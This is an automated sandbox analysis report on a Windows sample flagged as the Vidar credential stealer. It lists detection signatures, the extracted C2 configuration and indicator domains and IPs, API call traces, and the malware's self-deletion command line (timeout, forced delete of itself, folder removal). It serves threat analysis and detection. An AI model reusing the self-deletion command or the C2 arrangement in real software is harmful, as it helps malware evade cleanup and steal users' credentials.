Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
Analysis ID:1511546
MD5:5a4ccccb90b0aaa3b248d4f0dde38823
SHA1:be8f1d791a81696cd58e7f837a97aaea58eeb26a
SHA256:b802eb0f4a10d4aecc9015ee86ddc9b1249212dcabc2ecb6aa97418d0de7722b
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Self deletion via cmd or bat file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" MD5: 5A4CCCCB90B0AAA3B248D4F0DDE38823)
    • cmd.exe (PID: 6180 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6316 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "af458cf23e4b27326a35871876cc63d9"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe.2f0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-15T18:30:02.915417+020020287653Unknown Traffic192.168.2.1249718188.245.87.202443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://steamcommunity.com/profiles/76561199747278259/badgesAvira URL Cloud: Label: malware
          Source: https://t.me/armad2aAvira URL Cloud: Label: malware
          Source: https://steamcommunity.com/profiles/76561199747278259Avira URL Cloud: Label: malware
          Source: https://steamcommunity.com/profiles/76561199747278259/inventory/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "af458cf23e4b27326a35871876cc63d9"}
          Multi AV Scanner detection for domain / URL
          Source: arpdabl.zapto.orgVirustotal: Detection: 12%Perma Link
          Source: http://arpdabl.zapto.org/sVirustotal: Detection: 11%Perma Link
          Source: https://188.245.87.202/Virustotal: Detection: 15%Perma Link
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeReversingLabs: Detection: 63%
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeVirustotal: Detection: 69%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F6CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_002F6CD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F6D50 CryptUnprotectData,LocalAlloc,LocalFree,0_2_002F6D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F8980 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,0_2_002F8980
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00300DF0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00300DF0
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 23.50.98.133:443 -> 192.168.2.12:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49721 version: TLS 1.2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002F1110
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F9D40 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002F9D40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_002F99F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00305A70 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00305A70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00305EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00305EA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_002FAAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002FC2E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_002FA2C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_003056C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003056C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00304F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,0_2_00304F80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002FB390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_003053C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,0_2_003053C0

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199747278259
          Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /armad2a HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 188.245.87.202 188.245.87.202
          Source: Joe Sandbox ViewIP Address: 23.50.98.133 23.50.98.133
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.12:49718 -> 188.245.87.202:443
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F5010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_002F5010
          Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /armad2a HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: P3PV1/settings: always=a session=at-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-te equals www.youtube.com (Youtube)
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-te equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: t.me
          Source: global trafficDNS traffic detected: DNS query: arpdabl.zapto.org
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://arpdabl.zapto
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://arpdabl.zapto.
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://arpdabl.zapto..5938.149
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://arpdabl.zapto.org
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/D
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/n
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/s
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://arpdabl.zapto.org38.149
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://arpdabl.zapto0.5938.149
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreemen
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://188.245.87.202
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/0
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/T
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/c
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/rosoft
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampower
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=WG6XPcWBZkQp&a
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
